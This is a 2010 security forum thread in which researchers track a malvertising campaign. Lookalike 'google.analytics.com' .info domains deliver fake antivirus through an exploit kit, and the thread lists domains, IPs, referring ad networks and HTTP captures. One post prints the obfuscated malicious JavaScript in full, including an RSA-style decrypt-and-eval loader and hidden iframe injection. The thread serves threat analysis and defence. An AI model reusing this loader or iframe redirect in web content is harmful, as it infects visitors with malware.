Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on February 26, 2010, 05:12:30 pm

Title: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on February 26, 2010, 05:12:30 pm
Seeings quite a clients hitting this host:

http://google.analytics.com.tklaxlxvedkt.info/

Directories are all over the place:
/kav/kav3%20.asp/
/kav/kav3.exe/
/kav/kav3.php/
/kavo/avorp1kav3%20.asp/
/kavo/avorp1kav3.py/
/kavs/kav6.php/
/nte/avorp1kav6.php/
/kav/kav3.py/
/kavs/kav6%20.asp/

Serving up PDF's, Java Classes, and also fakeav. The fakeAV is being downloaded with the Java useragent after the malicious are classes served up finish executing.

FakeAV binary location:
google.analytics.com.tklaxlxvedkt.info/kav/kav3.php/eHc8d7c382V0100f070006R8db29656102T8351602d201l0409K71925c29303J030006010

VirusTotal.com Report:
http://www.virustotal.com/analisis/fa1df643d780e7f13b35981283940c4e2b5d3f053706ab03be90fc2a38bd9d7e-1267199064
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: SysAdMini on February 26, 2010, 05:29:09 pm
It is a NeoSploit exploit kit and distributes fake av.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on February 26, 2010, 07:51:24 pm
Found a bunch more:

google.analytics.com.jklnznqvztu.info
google.analytics.com.tluaweyermg.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.zugponkeqtzz.info

All resolve to the same IP:

75.125.183.50
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 06:33:03 pm
More:

google.analytics.com.hzlyaejcvmat.info - 69.174.245.150
google.analytics.com.lsvoenxxyya.info - 69.174.245.148
google.analytics.com.dbvvwrkgycfa.info - 69.174.245.147
google.analytics.com.yfguydudorip.info - 69.174.245.147
google.analytics.com.dcghkoixsagu.info - 72.51.41.155
google.analytics.com.gopbaqvgprvh.info - 72.51.41.155
google.analytics.com.dygpcewrjnw.info - 69.174.245.147
google.analytics.com.inxvwrxogrc.info - 69.174.245.150
google.analytics.com.kijksoeohxze.info -  72.51.41.155
google.analytics.com.prtrkmxkpctw.info - 75.125.183.50



Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 09:45:05 pm
Total found so far again:


google.analytics.com.byuigracdnjj.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zugponkeqtzz.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 01, 2010, 11:30:10 pm
This seems to be pretty widespread. The list of referrers is pretty extensive, looks like some advertising services did some business with some unsavory characters again.


Some of the referrering domains to the collection of malicious google.analytics.*.info domains:

Code: [Select]
ad.doubleclick.net
ad.yieldmanager.com
articles.moneycentral.msn.com
astrocenter.astrology.msn.com
autos.kosmix.com
autos.msn.com
blogs2.startribune.com
boards.msn.com
community.foxsports.com
creative.adonion.com
creative.clicksor.com
cyclops.prod.untd.com
data.cnbc.com
digg.com
eb.adbureau.net
entertainment.msn.com
environment-msnbc.newsvine.com
fordtruckworld.tenmagazines.com
gasbuddy.com
health.msn.com
integration.mtvnservices.com
lifestyle.msn.com
local.msn.com
mbd.scout.com
media.bannerimg.com
media.www.gwhatchet.com
moneycentral.msn.com
msn.careerbuilder.com
msn.foxsports.com
music.msn.com
my.juno.com
my.msn.com
nbcsports.newsvine.com
pd.startribune.com
player.jambovideonetwork.com
pr1.shoe-metro.us
profootball.scout.com
rad.msn.com
realestate.msn.com
ro-d.redorbit.com
secret5trading.com
showbiz411.blogs.thr.com
splashpage.mtv.com
tag.admeld.com
tennessee.scout.com
tv.msn.com
video.bobvila.com
view.atdmt.com
weather.msn.com
wonderwall.msn.com
worldblog.msnbc.msn.com
www.bobvila.com
www.business.com
www.buy.com
www.cheboygannews.com
www.cnbc.com
www.delish.com
www.evite.com
www.greatschools.org
www.heatvisionblog.com
www.hollywoodreporter.com
www.kob.com
www.legacy.com
www.merriam-webster.com
www.msnbc.msn.com
www.paperbackswap.com
www.redorbit.com
www.retrevo.com
www.soapcentral.com
www.startribune.com
www.thebluebanner.net
www.thelantern.com
www.theobr.com
www.thrfeed.com
www.tvland.com
www.upi.com
www.wunderground.com
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 02, 2010, 04:58:08 pm
Two more:

google.analytics.com.uentfkblzpxx.info
google.analytics.com.uwbhpcrydgta.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 03, 2010, 05:19:10 pm
Turned a bunch of info over to some experts and they are tracking down the malvertising and trying to identify the affiliates. This was described by as a "nest o' badness" and I do not think that is an understatement. Hopefully I will have a larger list of domains/IP's contributing to this.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 03, 2010, 07:11:02 pm
deleted
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 04, 2010, 10:01:18 pm
After conversations with US-CERT, they will be publishing an alert about this tomorrow/monday.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on March 07, 2010, 08:02:11 am
So I finally found the javascript causing the requests to go to the google.analytics.com.*.info domains. It appears that javascript coming back from adrotator.mediaplex.feed-mnptr.com had encoded+obfuscated+encrypted javascript that redirects people to the google.analytics.com.*.info domains.

Here is the portion of the malicious javascript that it was serving up previously:
Code: [Select]
var RSA={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},decrypt:function(c,d,n){c=this.strhex(c);var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}return result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:133,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:142,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:151,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.charAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabet.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=this.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}return output}}


statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var cd1 = "adr";
var cd2 = "otator.m";
var cd3 = "ediaplex.feed-mnptr.com";
var cur_domain = cd1 + cd2 + cd3;
       var all_t = "1,2,3,4,5,6,7,8,9";
       var mtch = all_t.match(statictml);
if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=260233594&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
                              
//
var jse1 = "htt"; var jse2 = "p://adr"; var jse3 = "otator.mediaple"; var jse4 = "x.feed-mnptr.com/stats_js_e.php?id=260233594";
var jse = jse1 + jse2 + jse3 + jse4;
document.write(unescape("%3Ciframe src='" + jse + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//


eval(RSA.decrypt('1c8e162194ee9b0fc499a16b2e423b376922958cda38cd50234229fa051a0742ecf1c22b4894d2e1526c13d66570af6256039b11934eaaa6292067d2e092b70a18b1f21422f606dd839108925e32edb3c316a1d7242708a29c620325137ca2170bc4003a6072c3fdbf2da9fd729c5fcd0af3295172a40d353fef13d30c2e044bc912eb149614207741efaa850d799412b990931f3efba394928b1aa73c32c4712c25f77662aec8d22a2da282879a040aa84f20f3083c2d7b4d30a7e0b52e1a1e22b00afd0e914113ccbe4d0c5bfa31568b7317633401ba627919dde2e066c9ea1d7147f0a9b7f813693ac31330201dd064925c196902237f21708460182ccd8113e527','14947943','64253471'));

}

All of this javascript just causes the following to get written into the document:

Code: [Select]
<iframe>width="1" height="1" style="visibility: hidden;" src="http://google.analytics.com.hzlyaejcvmat[dot]info/ld/kav2/" </iframe>

The registration stuff on feed-mnptr.com seems suspect:

Domain name: feed-mnptr.com

Registrant Contact:
   ReligionSeeke
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Administrative Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Technical Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Billing Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

DNS:
free01.editdns.net
free02.editdns.net

Created: 2010-01-30
Expires: 2011-01-30

Something very fishy going on....



Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: jboyhb on March 24, 2010, 02:03:10 pm
More:

IP: 66.135.41.32

google.analytics(dot)com.mdmnegsxcytq.info/kav/kav5.php
google.analytics(dot)com.mdmnegsxcytq.info/kav/KAV5.py/oH5100219cV0100f036002R22c9ccec102T1aaa3015Q000002fa901801F0016000aJ11000601l0409K5b577271317

Wepawet:
benign

jsunpack:
Malicious
http://jsunpack.eyeprotectiongroup.com/dec/go?report=9b1a7c8123b3f0fa1a4225b6150fb7ca55c15823

Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: mwollenweber on March 25, 2010, 11:12:42 pm
Does anyone have a sample of the PDF? It seems like the kav executable is after successful exploitation by the PDF. However, I have a Mac that downloaded the executable but I can't find the PDF on disk (yet). Has anyone seen it work on OS X? And if you have a sample please let me know. Thanks.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on April 30, 2010, 04:35:52 pm
Yahoo! is still doing business with some of these people apparently.

Request:
Code: [Select]
GET /cust.php?n=cust3 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/m
sword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xba
p, application/x-ms-application, */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdANplCgCfIksAAAAAAB-FFAAAAAAAAgAEA
AYAAAAAAP8AAAAGC1RkEgAAAAAAHZ0KAAAAAABvxxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAHYgUAAAAAAAIAAwAAAAAAH4XrUbge3T8fhetRuB7dPx-F61G4Ht0.H4XrUbg
e3T8AAAAAAADwPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO5nMQqMkjCOVE
-tNHXz8ZdCqW3h6dqVv9AKFTAAAAAA==,http%3A%2F%2Fd.tradex.openx.com%2Fck.php%3Foapar
ams%3D2__bannerid%3D2643__zoneid%3D1829__cb%3Da0101f785d__r_id%3D38f962825de0b640
a8012aa1fa0e632f__r_ts%3Dl1p0rs__oadest%3D%24,http%3A%2F%2Fd.tradex.openx.com%2Fa
fr.php%3Frefresh%3D45%26zoneid%3D1829%26cb%3Dinsert_random_number_here%26loc%3Dht
tp%253a%252f%252fd.tradex.openx.com%252fafr.php%253fzoneid%253d1826%2526cb%253din
sert_random_number_here,Z%3D728x90%26x%3Dhttp%253A%252F%252Fd%252Etradex%252Eopen
x%252Ecom%252Fck%252Ephp%253Foaparams%253D2%255F%255Fbannerid%253D2643%255F%255Fz
oneid%253D1829%255F%255Fcb%253Da0101f785d%255F%255Fr%255Fid%253D38f962825de0b640a
8012aa1fa0e632f%255F%255Fr%255Fts%253Dl1p0rs%255F%255Foadest%253D%24%26s%3D681434
%26_salt%3D237608200%26B%3D10%26u%3Dhttp%253A%252F%252Fd.tradex.openx.com%252Fafr
.php%253Frefresh%253D45%2526zoneid%253D1829%2526cb%253DINSERT_RANDOM_NUMBER_HERE%
2526loc%253Dhttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Fzonei
d%25253D1826%252526cb%25253DINSERT_RANDOM_NUMBER_HERE%26r%3D0,5372d202-5462-11df-
80ae-001e6849f50f
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: sefito.com
Connection: Keep-Alive

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 30 Apr 2010 14:11:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 158
<html>
<body>

<iframe src="http://google.analytics.com.uwyovhxythol.info/ld/kav4/" style="visib
ility:hidden;" width="1" height="1"></iframe>

</body>
</html>

Looks like they are adding intermediary domains between the two now sometimes, this is not nearly as widespread as before, but still wayyyyy to many people use Yeildmanagers advertising service and are potentially infecting their clients. Google too via DoubleClick.net:

Code: [Select]
GET /ld/kav4/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.m
s-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms
-powerpoint, application/msword, */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-425659629246
7410&output=html&h=90&slotname=3697413835&w=728&ea=0&flash=10.0.32.18&url=http%3A
%2F%2Fwww.sparkpeople.com%2Fresource%2Fgames_trivia.asp&dt=1272580330993&shv=r201
00414&correlator=1272580330993&frm=1&ga_vid=714073391.1263411881&ga_sid=127258007
9&ga_hid=2005532139&ga_fc=1&u_tz=-360&u_his=36&u_java=0&u_h=1050&u_w=1680&u_ah=10
00&u_aw=1680&u_cd=32&u_nplug=0&u_nmime=0&biw=814&bih=779&ifk=1157504475&fu=4&ifi=
1&dtd=78
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; MS-R
TC LM 8)
Host: google.analytics.com.vdifjlhzgas.info
Connection: Keep-Alive


domains to add to the list:
sefito.com - redirects to malvertising hosts.

google.analytics.com.aojegqdnwjvj.info
google.analytics.com.arffzejadvl.info
google.analytics.com.atdvtodlubs.info
google.analytics.com.fhccvgjohscc.info
google.analytics.com.ggfinekjvfmg.info
google.analytics.com.gijiinhivudu.info
google.analytics.com.ltxmklkxkuh.info
google.analytics.com.meejnagyeuzi.info
google.analytics.com.rqpqgqyjlmex.info
google.analytics.com.scvepuxdfzar.info
google.analytics.com.tbuygryyutcj.info
google.analytics.com.uwyovhxythol.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.waolovbichmz.info
google.analytics.com.zfnefclseth.info

All resolve to 67.18.213.122 for over the last week.
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on May 03, 2010, 02:34:11 pm
More on 67.18.213.122 :

google.analytics.com.pswdypsaxtqh.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.sxyayfphgqfo.info
google.analytics.com.mpmygrdjymz.info
Title: Re: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By
Post by: eoin.miller on May 04, 2010, 09:05:01 pm
173.236.39.122

google.analytics.com.wcgzxcdbineo.info